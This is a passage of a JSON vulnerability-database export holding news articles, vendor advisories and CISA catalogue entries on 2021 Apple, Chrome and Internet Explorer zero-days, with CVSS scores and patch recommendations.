"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:18", "description": "[](<https://thehackernews.com/images/-b6kGmU8c6Gc/YP-1oely-GI/AAAAAAAADV0/MURJ7OCSDsoeAi2sHU_Bb2cqNT4e2C-qACLcBGAsYHQ/s0/apple-iphone-hacking.jpg>)\n\nApple on Monday rolled out an urgent security update for [iOS, iPadOS](<https://support.apple.com/en-us/HT212622>), and [macOS](<https://support.apple.com/en-us/HT212623>) to address a zero-day flaw that it said may have been actively exploited, making it the thirteenth such vulnerability Apple has patched since the start of this year.\n\nThe updates, which arrive less than a week after the company released iOS 14.7, iPadOS 14.7, and macOS Big Sur 11.5 to the public, fixes a memory corruption issue (**CVE-2021-30807**) in the IOMobileFrameBuffer component, a kernel extension for managing the screen [framebuffer](<https://en.wikipedia.org/wiki/Framebuffer>), that could be abused to execute arbitrary code with kernel privileges.\n\nThe company said it addressed the issue with improved memory handling, noting it's \"aware of a report that this issue may have been actively exploited.\" As is typically the case, additional details about the flaw have not been disclosed to prevent the weaponization of the vulnerability for additional attacks. Apple credited an anonymous researcher for discovering and reporting the vulnerability.\n\nThe timing of the update also raises questions about whether the zero-day had any role in compromising iPhones using NSO Group's [Pegasus software](<https://forbiddenstories.org/case/the-pegasus-project/>), which has become the focus of a series of [investigative reports](<https://thehackernews.com/2021/07/new-leak-reveals-abuse-of-pegasus.html>) that have exposed how the spyware tool turned mobile phones of journalists, human rights activists, and others into portable surveillance devices, granting complete access to sensitive information stored in them.\n\nCVE-2021-30807 is also the thirteenth zero-day vulnerability addressed by Apple this year alone, including \u2014\n\n * [CVE-2021-1782](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges\n * [CVE-2021-1870](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [CVE-2021-1871](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [CVE-2021-1879](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting\n * [CVE-2021-30657](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks\n * [CVE-2021-30661](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30663](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30665](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30666](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30713](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences\n * [CVE-2021-30761](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [CVE-2021-30762](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n\nGiven the [public availability](<https://twitter.com/b1n4r1b01/status/1419734027565617165>) of a proof-of-concept (PoC) exploit, it's highly recommended that users move quickly to update their devices to the latest version to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-27T07:28:00", "type": "thn", "title": "Apple Releases Urgent 0-Day Bug Patch for Mac, iPhone and iPad Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807"], "modified": "2021-07-27T11:14:04", "id": "THN:080F85D43290560CDED8F282EE277B00", "href": "https://thehackernews.com/2021/07/apple-releases-urgent-0-day-bug-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEj9Bd2VdAXWvbASf8YmWxr5iArtahL17_NleXHz62PXrscVcuyhLoDB7s3THH7T3H2cNZseMCfhLHRI9u5ESRDFZknnkYq6qqLc5c9bPFMM7KFlt0MGfj_ufHze0jtqtN8jGQiQUtNiSL3Kgq8Vsdc1lkrooiJsHq3ucrJQr03nO_OVN3I2C0POzJAs>)\n\nApple on Monday released a security update for iOS and iPad to address a critical vulnerability that it says is being exploited in the wild, making it the 17th zero-day flaw the company has addressed in its products since the start of the year.\n\nThe weakness, assigned the identifier [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>), concerns a memory corruption issue in the \"IOMobileFrameBuffer\" component that could allow an application to execute arbitrary code with kernel privileges. Crediting an anonymous researcher for reporting the vulnerability, Apple said it's \"aware of a report that this issue may have been actively exploited.\"\n\nTechnical specifics about the flaw and the nature of the attacks remain unavailable as yet, as is the identity of the threat actor, so as to allow a majority of the users to apply the patch and prevent other adversaries from weaponizing the vulnerability. The iPhone maker said it addressed the issue with improved memory handling.\n\nBut soon after the advisory was released, security researcher Saar Amar [shared](<https://saaramar.github.io/IOMFB_integer_overflow_poc/>) additional details, and a proof-of-concept (PoC) exploit, noting that \"this attack surface is highly interesting because it's accessible from the app sandbox (so it's great for jailbreaks) and many other processes, making it a good candidate for LPEs exploits in chains.\"\n\nCVE-2021-30883 is also the second zero-day impacting IOMobileFrameBuffer after Apple addressed a similar, anonymously reported memory corruption issue (CVE-2021-30807) in July 2021, raising the possibility that the two flaws could be related. With the latest fix, the company has resolved a record 17 zero-days to date in 2021 alone \u2014\n\n * [**CVE-2021-1782**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges\n * [**CVE-2021-1870**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [**CVE-2021-1871**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (WebKit) - A remote attacker may be able to cause arbitrary code execution\n * [**CVE-2021-1879**](<https://thehackernews.com/2021/03/apple-issues-urgent-patch-update-for.html>) (WebKit) - Processing maliciously crafted web content may lead to universal cross-site scripting\n * [**CVE-2021-30657**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (System Preferences) - A malicious application may bypass Gatekeeper checks\n * [**CVE-2021-30661**](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>) (WebKit Storage) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30663**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30665**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30666**](<https://thehackernews.com/2021/05/apple-releases-urgent-security-patches.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30713**](<https://thehackernews.com/2021/05/apple-issues-patches-to-combat-ongoing.html>) (TCC framework) - A malicious application may be able to bypass Privacy preferences\n * [**CVE-2021-30761**](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30762**](<https://thehackernews.com/2021/06/apple-issues-urgent-patches-for-2-zero.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30807**](<https://thehackernews.com/2021/07/apple-releases-urgent-0-day-bug-patch.html>) (IOMobileFrameBuffer) - An application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2021-30858**](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2021-30860**](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) (CoreGraphics) - Processing a maliciously crafted PDF may lead to arbitrary code execution\n * [**CVE-2021-30869**](<https://thehackernews.com/2021/09/urgent-apple-ios-and-macos-updates.html>) (XNU) - A malicious application may be able to execute arbitrary code with kernel privileges\n\nApple iPhone and iPad users are highly recommended to update to the latest version (iOS 15.0.2 and iPad 15.0.2) to mitigate the security vulnerability.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T02:41:00", "type": "thn", "title": "Apple Releases Urgent iPhone and iPad Updates to Patch New Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883"], "modified": "2021-10-20T05:21:18", "id": "THN:BB8CDCFD08801BDD2929E342853D03E9", "href": "https://thehackernews.com/2021/10/apple-releases-urgent-iphone-and-ipad.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:09", "description": "A heap corruption vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-26T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Heap Corruption (CVE-2021-30551)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-07-26T00:00:00", "id": "CPAI-2021-0484", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:32:23", "description": "A use after free vulnerability exists in Apple WebKit. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-07-26T00:00:00", "type": "checkpoint_advisories", "title": "Apple WebKit Use After Free (CVE-2021-1879)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-07-26T00:00:00", "id": "CPAI-2021-0481", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-02-16T19:32:13", "description": "An out-of-bounds write vulnerability exists in Microsoft Internet Explorer. Successful exploitation of this vulnerability could lead to arbitrary code execution in the context of the affected application.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-26T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Out-of-Bounds Write (CVE-2021-33742)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2021-07-26T00:00:00", "id": "CPAI-2021-0485", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:32:23", "description": "A heap corruption vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-26T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Heap Corruption (CVE-2021-21166)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2021-07-26T00:00:00", "id": "CPAI-2021-0482", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2023-02-09T14:01:02", "description": "Google has released Chrome version 91.0.4472.101 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. One of these vulnerabilities\u2014[CVE-2021-30551](<https://vulners.com/cve/CVE-2021-30551>)\u2014has been detected in exploits in the wild.\n\nCISA encourages users and administrators to review the [Chrome Release Note](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/06/10/google-releases-security-updates-chrome>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-10T00:00:00", "type": "cisa", "title": "Google Releases Security Updates for Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-06-10T00:00:00", "id": "CISA:F9916EF5EF9E126FF62CF4162B96669F", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/06/10/google-releases-security-updates-chrome", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T00:48:09", "description": "Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2021-06-15T22:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2022-09-28T20:02:00", "id": "PRION:CVE-2021-30551", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-30551", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:31:51", "description": "This issue was addressed by improved management of object lifetimes. This issue is fixed in iOS 12.5.2, iOS 14.4.2 and iPadOS 14.4.2, watchOS 7.3.3. Processing maliciously crafted web content may lead to universal cross site scripting. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-04-02T19:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2021-1879", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-1879", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T00:52:32", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2023-08-08T14:22:00", "id": "PRION:CVE-2021-33742", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-33742", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:34:18", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2021-03-09T18:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21166"], "modified": "2022-06-28T14:11:00", "id": "PRION:CVE-2021-21166", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-12-02T16:19:50", "description": "Google Chromium V8 Engine contains a type confusion vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability affects web browsers that utilize Chromium, including Google Chrome and Microsoft Edge.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Google Chromium V8 Type Confusion Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30551"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-30551", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:19:50", "description": "Microsoft Windows MSHTML Platform contains an unspecified vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows MSHTML Platform Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 